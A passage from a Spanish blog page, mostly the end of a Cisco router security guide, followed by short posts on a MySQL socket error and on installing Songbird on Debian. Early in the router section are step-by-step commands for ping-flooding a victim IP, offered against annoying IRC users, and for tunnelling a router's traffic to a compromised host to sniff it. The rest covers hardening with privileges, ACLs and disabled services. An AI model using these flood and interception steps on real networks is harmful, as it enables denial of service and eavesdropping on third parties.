indicarnos los distintos niveles de acceso, de lo contrario solo nos aparece
la palabra que elegimos y se hace medio confuso. Si quieren dejar el prompt
como viene por default hacen "no prompt PALABRA".
Algo por demás útil para esos molestos del IRC es usar el router para realizar
un PING flood, imagínense que estos aparatos manejan un buen ancho de banda,
por lo que este tipo de DoS puede volverse muy efectivo:
routers#ping
Protocol[IP]: (ENTER)
Target IP address: 200.87.100.10
Repeat count [5]: 500000
Datagram size [100]: 20000
Time out in seconds [2]: 0
Extended commands [n]: (ENTER)
Sweep range of sizes [n]: (ENTER)
Después de poner "ping", en la primera linea presionamos ENTER, en la segunda
linea ponemos la dirección IP de la víctima, en la tercera linea la cantidad
de veces que queremos que se envié el paquete, en la cuarta linea el tamaño
del paquete, en la quinta linea los segundos que debe esperar y en las
siguientes dos lineas presionamos ENTER.
Para finalizar esta sección me gustaría explicar brevemente algo muy útil como
lo es sniffear un router.
La teoría es mas que simple, lo que haríamos seria re-rutear el trafico del
router enviándolo a nuestro box, sniffear los paquetes que llegan y volver a
enviar ese trafico desde nuestro box al router para que este los dirija a su
destino real.
Esta técnica fue originalmente descripta por gaius del HERT en la Phrack 56;
junto con su excelente articulo venia el tunnelx.c que es el soft que nos
permitirá redireccionar el trafico del tunel a una interfaz existente, pero
nosotros vamos a utilizar el funnel.c hecho por jimjones de [lowlevel] ya que tuve mejores resultados con este.
Como dije al principio la teoría es mas que simple, y el llevarlo a la practica
también lo es, así que sigamos este caso hipotético:
root@foo#telnet 192.168.1.200 (IP del router)
router>enable
router#configure terminal
router(config)#int tunnel0
router(config-if)#ip address 192.168.0.1 255.255.255.0
router(config-if)#tunnel mode gre ip
router(config-if)#tunnel source Ethernet0/0/0
router(config-if)#tunnel destination 192.168.1.20
router(config-if)#exit
router(config)#exit
router#disable
router>
Con esto ya re-ruteamos todo el trafico a nuestro box en la IP 192.168.1.20
Cuando digo "nuestro" box, no me refiero a "nuestro" box, sino a algún box
owneado que tengamos por allí.
A partir de aquí compilamos y corremos el funnel, y con cualquier sniffer
como el dsniff capturamos los paquetes que nos llegan. Luego simplemente
levantamos un tunel hacia el router desde nuestro box y le redireccionamos
los paquetes.
Si tienen problemas para compilar el funnel.c lo mas probable es que les
falte alguna libreria. El funnel.c se lo pueden bajar de www.low-level.net.
4. Defendiendo nuestro CISCO.
Los siguientes son los conceptos básicos que deberemos tener en cuenta si
vamos a administrar la seguridad de un router CISCO. Tengan en cuenta que
esto solo es "lo básico", y en la mayoría de los casos todo dependerá del
router que estén usando y de las necesidades de la red.
A. Usuarios y privilegios.
Los privilegios de acceso van desde 0 hasta 15, siendo 1 lo usual para un
usuario normal(cuando nos logueamos al router) y 15 el default para el usuario
privilegiado.
router>show privilege
Current privilege level is 1
router>enable
Password:
router#show privilege
Current privilege level is 15
router#disable
router>show privilege
Current privilege level is 1
Podemos proteger la contraseña del usuario privilegiado(llamemoslo enable)
mediante dos tipos de encriptación, una con un algoritmo de encriptacion
trivial de CISCO conocido como de tipo 7, y otra con MD5 que es un algoritmo
muy fuerte conocido como de tipo 5.
Para encriptar el password de enable con el algoritomo trivial de CISCO
simplemente hacemos un "enable password", y a continuación bajamos el
ciscocrack.c de PacketStorm para crackearlo, ahora si deseamos utilizar un
algoritmo de encriptación en serio hacemos lo siguiente:
router#configure terminal
router(config)#enable secret NEWPASS
router#exit
router#copy running-config startup-config
Vemos que entramos en modo de configuración, cambiamos el password, salimos
del modo de configuración y guardamos los cambios copiando la configuración
al startup.
Ahora vamos a cambiar la contraseña para todos aquellos que ingresen mediante
telnet con privilegio de ejecución normal. Como vemos lo estamos haciendo para
las terminales virtuales desde la 0 hasta la 5:
router#configure terminal
router(config)#no enable secret
router(config)#line vty 0 4
router(config)#password NEWPASS
router(config)#exit
Si somos muy paranoicos directamente podemos desactivar el acceso al router
mediante telnet de esta forma:
router#configure terminal
router(config)#no enable secret
router(config)#line vty 0 4
router(config)#transport input none
router(config)#exit
router#
Por default cuando nos conectamos a la consola o al puerto auxiliar tenemos
privilegios de ejecución de usuario(nivel 1 por default) sin password. De la
siguiente forma lo configuramos para que nos pida password:
router#configure terminal
router(config)#line console 0
router(config)#login
router(config)#password PASS
router(config)#exec-timeout 1 30
router(config)#line aux 0
router(config)#login
router(config)#password PASS
router(config)#exit
router#
Como habíamos visto al principio con los comandos "show", el IOS permite el
uso de ciertos comandos con privilegios mínimos que no debería permitir; es
mas, al listar los comandos disponibles con "comando ?" solo aparecen algunos,
pero si ejecutamos otros que sabemos que se encuentran estando en modo enable
los podremos utilizar sin ninguna restricción.
Una solución para prevenir que personas sin los suficientes privilegios puedan
tocar o mirar cosas que no deben en nuestro router, es asignarle al usuario
normal privilegios de 0 en vez de 1. Al hacer esto le estamos restringiendo
el uso de todos los comandos y manualmente debemos especificar que comandos
puede utilizar.
También es valido el proceso contrario, directamente especificamos que solo
podrán ejecutar ciertos comandos los que tengan un determinado nivel de
privilegios.
router#privilege exec level 7 show
router#enable password level 7 PASS
En este ejemplo lo que decimos es que para poder utilizar el comando show
debemos poseer un nivel de privilegio 7, y luego seteamos un password para
ese nivel.
B. Listas de acceso.
Tenemos dos tipos de listas de acceso, las estándares y las extendidas.
Las estándares tienen una sola dirección de correspondencia, mientras que
las extendidas tienen dos direcciones con información opcional del tipo de
protocolo.
- Listas de acceso estándares:
access-list lista [permit|deny] IP mascara
"lista" es un valor numérico que va desde 1 hasta 99. "permit" y "deny"
corresponden a permitir y denegar en las reglas. Los valores de "IP" y
"mascara" son de 32 bits y se escriben en notación decimal punteada, pero
no debe confundirse esta "mascara" con la mascara de subred que subdivide
un numero de asignación de red IP.
Veamos estos ejemplos:
access-list 1 permit 200.51.210.0 0.0.0.255
access-list 1 permit 200.45.0.0 0.0.255.255
Aqui especificamos dos valores de IP y mascara, ambos se aplican al numero
1 de la lista de acceso. El primer comando de la lista permite el acceso a
toda la clase C de 200.51.210.0 y el segundo permite acceso a toda la clase
B de 200.45.0.0.
Si no se especifica valor de mascara se entenderá que es todo 0.0.0.0; por
lo que lo siguiente tendría el mismo efecto:
access-list 2 permit 200.45.184.3 0.0.0.0
access-list 2 permit 200.45.184.3
en este caso solo se permite el trafico de la IP 200.45.184.3.
Ahora, para terminar de redondear el tema sobre este tipo de listas, veamos
el siguiente ejemplo:
access-list 3 permit 24.232.144.11 0.0.0.0
access-list 3 deny 24.232.0.0 0.0.255.255
access-list 3 permit 24.0.0.0 0.255.255.255
Lo que decimos aquí es que se permita el trafico a toda la clase A 24.0.0.0,
pero dentro de esta red se le deniegue a la clase B 24.232.0.0, exceptuando
a la IP 24.232.144.11 que si tiene permitido el trafico.
- Listas de acceso extendidas:
Las listas de acceso extendidas nos permiten filtrar el trafico de una
interfaz en base a direcciones IP fuente y destino, además de la información
del protocolo.
access-list lista [permit|deny] prot IP_in masc_in IP_out masc_out oper
"lista" es un valor numérico que ira desde de 100 hasta 199, y sirve para
identificar a las distintas reglas. "permit" y "deny" corresponden a permitir
y denegar en las reglas. "prot" es el protocolo que usaremos, que puede ser
IP, TCP, UDP e ICMP, pero como el IP encapsula los paquetes TCP, UDP e ICMP
puede utilizarse para igualar a cualquiera de ellos. "IP_in" y "masc_in" nos
indicaran la IP origen. "IP_out" y "masc_out" nos indicaran la IP destino;
recuerden que aquí la mascara no tiene nada que ver con la mascara de subred
en redes IP. Con "oper"(operador y operando) se puede comparar los números
de puerto, puntos de acceso o nombres de contacto; estos valores son validos
para TCP y UDP, siendo los operadores posibles it(menor que), eq(igual que),
gt(mayor que) y neq(diferente que).
A los ejemplos:
access-list 101 deny tcp 24.232.1.1 0.0.0.0 200.47.180.0 0.0.0.255 eq 23
Aqui simplemente estamos diciendo que la IP 24.232.1.1, no puede hacer ninguna
conexion TCP al puerto 23 de la red clase C 200.47.180.0.
Veamos otro:
access-list 101 permit tcp 0.0.0.0 255.255.255.255 200.30.0.0 0.0.255.255 gt 1023
access-list 101 permit tcp 0.0.0.0 255.255.255.255 200.30.10.1 0.0.0.0 eq 25
access-list 101 permit icmp 0.0.0.0 255.255.255.255 200.30.0.0 255.255.255.255
interface ethernet 0
ip access-group 101
El primer comando de la lista, permite cualquier conexión TCP entrante con
puertos destinatarios mayores a 1023. El segundo comando de la lista admite
conexiones de cualquier lugar al puerto 25 de la IP 200.30.10.1. El ultimo
comando permite los mensajes ICMP entrantes para la retroalimentación de error.
Hay que tener en cuenta que en las listas de acceso extendidas, una vez que
terminamos de definirlas se las tenemos que aplicar a una interfaz en concreto,
por supuesto aplicándole un numero de lista como en las dos ultimas lineas
del ejemplo anterior:
interface ethernet 0
ip access-group 101
Veamos un ultimo ejemplo esperando que mi cabeza pueda seguir un poco mas.
Supongamos lo siguiente, somos los administradores de la red 200.47.0.0 que se
encuentra conectada a Internet. Y queremos que desde esta red hacia Internet
se pueda establecer cualquier conexión TCP, pero no queremos lo contrario,
salvo por la maquina 200.47.10.8 en la que tenemos un webserver y en este caso
si permitiremos conexiones desde Internet a esa IP pero solo en el puerto 80.
access-lists 102 permit tcp 0.0.0.0 255.255.255.255 200.47.0.0 0.0.255.255 established
access-lists 102 permit tcp 0.0.0.0 255.255.255.255 200.47.10.8 0.0.0.0 eq 80
interface ethernet 0
ip access-group 102
Como vemos la palabra "established" es la clave aquí, puesto que puede indicar
una conexión establecida en el protocolo TCP.
Por ultimo, cualquier error que hayamos cometido al hacer las listas de acceso
tanto estándares como extendidas, lo podemos subsanar eliminando la lista
de esta forma:
no access-list lista
donde "lista" es el numero que le pusimos a la regla.
C. Editar ACLs en Cisco
Muchas de las veces que tenemos que editar una ACL para insertar una IP o borrar otra lo que hacemos es borrar la ACL por completo y metemos la ACL completa rectificada de nuevo, pero podemos hacerlo mucho más simple insertando y borrando reglas de una en una.
El método clásico sería copiar la ACL, borrarla y volver a crearla modificada (el primer paso es crear el ACL aunque se supone que ya está creada):
1.Creamos la ACL:
router#configure terminal
router(config)#access-list 121 deny icmp any any
router(config)#access-list 121 permit ip any any
2.Mostramos la ACL para copiarla en un editor y modificarla:
router#show access-list
Extended IP access list 121
deny icmp any any
permit ip any any
3.Borramos la ACL:
router#configure terminal
router(config)#no access-list 101 deny icmp any any
NOTA: Si intentamos borrar una SOLA línea también borrará la ACL por completo.
4.Comprobamos que la ACL está borrada :
router#show access-list
router#
Si intentamos añadir una línea lo hará al final que seguramente no sea lo que queramos especialmente si poner al final algún tipo de DENY, los líneas añadidas estarán por debajo del DENY y por lo tanto serán ignoradas.
Para insertar podemos hacer lo siguiente:
1.Listar la ACL (los números son importantes):
router#show access-list 121
Extended IP access list 121
10 deny icmp any any
20 permit ip any any
2.Para insertar lo que tenemos que hacer es entrar en la ACL y luego usar los números para insertar en la posición correcta:
router#configure terminal
router(config)#ip access-list extended 121
router(config-ext-nacl)#6 permit icmp 10.0.0.0 0.0.0.255 any
3.Si mostramos ahora la ACL veremos que hemos insertado una línea donde hemos indicado:
router#show access-list 121
Extended IP access list 121
6 permit icmp 10.0.0.0 0.0.0.255 any
10 deny icmp any any
20 permit ip any any
Lo mismo para borrar una línea concreta que se puede hacer de dos formas:
1.Listar la ACL (los números también son son importantes):
router#show access-list 121
Extended IP access list 121
10 deny icmp any any
20 permit ip any any
2.Primero entramos en la ACL (al igual que antes:
router#configure terminal
router(config)#ip access-list extended 121
3.Y ahora podemos borrar de 2 formas:
Usando el número de la línea:
router#no 1
Negango la línea completa:
router#no deny icmp any any
4.Si mostramos ahora la ACL veremos que hemos insertado una línea donde hemos indicado:
router#show access-list 121
Extended IP access list 121
6 permit icmp 10.0.0.0 0.0.0.255 any
20 permit ip any any
Para una completa compresión de las ACL podemos ir a la web de Cisco que explica detalladamente las ACLs:
D. Deshabilitando servicios.
Generalmente la mayoría de los routers CISCO vienen corriendo con muchos
servicios por default que jamas vamos a utilizar. Los siguientes son algunos
servicios que deberíamos considerar desactivar:
no service udp-small-servers
no service tcp-small-servers
no service finger
no ip bootp server
no ip http server
no service pad
no ntp enable
Algunos de los siguientes servicios deberemos indicarle la interfaz donde
vamos a desactivar el servicio, tengan en cuenta de hacerlo en todas si es
necesario:
interface Ethernet0
no cdp enable
!para desactivar el protocolo CDP
no cdp run
!lo mismo que lo anterior pero de manera global
no ip unreachables
!para evitar que sepan que usamos listas de acceso
interface Ethernet1
no ip proxy-arp
!si no necesitamos el servicio de proxy ARP
interface Ethernet1
no ip redirects
!si no necesitamos enviar redireccionamientos
interface Ethernet0
no ip directed-broadcast
!para evitar ataques del tipo smurf
5. Despedida.
Como vimos los routers CISCO son como cualquier otro sistema que conocemos,
no podemos dejarlo funcionando con una "instalación por default", y gracias
a la inoperancia de CISCO en algunos aspectos esto se complica mucho mas.
Bueno, espero que esta mini-guia con los conceptos básicos de la seguridad
en estos routers les haya sido útil. Si son administradores espero que
puedan dormir con una falsa sensación de seguridad y si no lo son estoy
seguro que se van a divertir mucho.
Disculpen cualquier gran error que haya cometido, y cualquier comentario o
critica sera bien recibida. Si me llega algun feedback de quienes les haya
servido esto posiblemente lo vuelva a editar con mas cosas.
5/3/09
Error 2002 Mysql
ERROR 2002: Can't connect to local MySQL server
through socket '/var/run/mysql/mysql.sock' (2)
Solucion 1
#safe_mysqld &
#mysql
#mysql_install_db
#chown -R mysql.mysql /var/lib/mysql
#safe_mysqld &
Solucion 2
#mysql_install_db
#exit
/#etc/rc.d/rc.mysqld start
Solucion 3
# mysql_install_db
# chown -R mysql.mysql /var/lib/mysql
Esto me sirvio para Debian....
4/2/09
Instalando Songbird en Debian Lenny
Hace mucho había querido poder instalar este reproductor de medios, las instrucciones las pude obtener de esta dirección, tan solo hice una modificación pequeña para personalizar de acuerdo a mi gusto, tambien comentar que hay dos formas de hacerlo, a la forma "Debian" es decir con su paquete .deb o de la manera "Linux".. sip desde consola configurando algunos archivos.. preferí la forma Linux para aprender más, ok vamos con los pasos:
- Descargamos la última versión de Songbird desde este link
- Descomprimir el archivo en /opt/, que es donde los instalaremos. Ejecutar este comando desde la terminal: sudo tar -xvzf Songbird*.tar.gz -C /opt/
- Cambiar los permisos de la carpeta /opt/Songbird/. Sustituya usuario por su nombre de usuario. Es decir chown -R usuario /opt/Songbird/
- Con los pasos anteriores ya esta instalado... claro pero no lo "vemos" desde el menu de aplicaciones, para solucionar esto tan solo debemos hacer lo siguiente para añadir Songbird al menú Aplicaciones → Sonido y Vídeo: gedit /usr/share/applications/Songbird.desktop
- Copie y pegue el siguiente texto en el documento nuevo, guarde y cierre. En el campo "Icon" se enlaza al icono que queramos mostrar en el menú. Elija el que desea, por defecto Songbird trae un *.png para usarlo pero podemos usar el que se guste:
[Desktop Entry]
Name=Songbird
Comment=Reproductor Multimedia
Exec=/opt/Songbird/songbird
Icon=/opt/Songbird/songbird.png
Terminal=false
Type=Application
Categories=Application;AudioVideo; - Para ejecutar Songbird desde la terminal con un simple comando: gedit /usr/bin/songbird
Añada esto al documento:
#!/bin/sh
/opt/Songbird/songbird "$*"Lo Guárdamo y cierramos el editor. Ahora ejecutamos este comando:
sudo chmod +x /usr/bin/songbird
Ya está instalado y funcionando de la manera más cómoda. Podemos ver que el icono de Songbird esta en Aplicaciones → Sonido y Vídeo, lo podemos ejecutar desde allí o desde la consola con "songbird".
12/1/09
Suscribirse a:
Entradas (Atom)
-
Muchas veces cuando uno se inicia en Linux quiere poder acceder a algunos equipos de manera gráfica y no por ssh para poder copiar o ver alg... -
Hace mucho había querido poder instalar este reproductor de medios, las instrucciones las pude obtener de esta dirección, tan solo hice una ...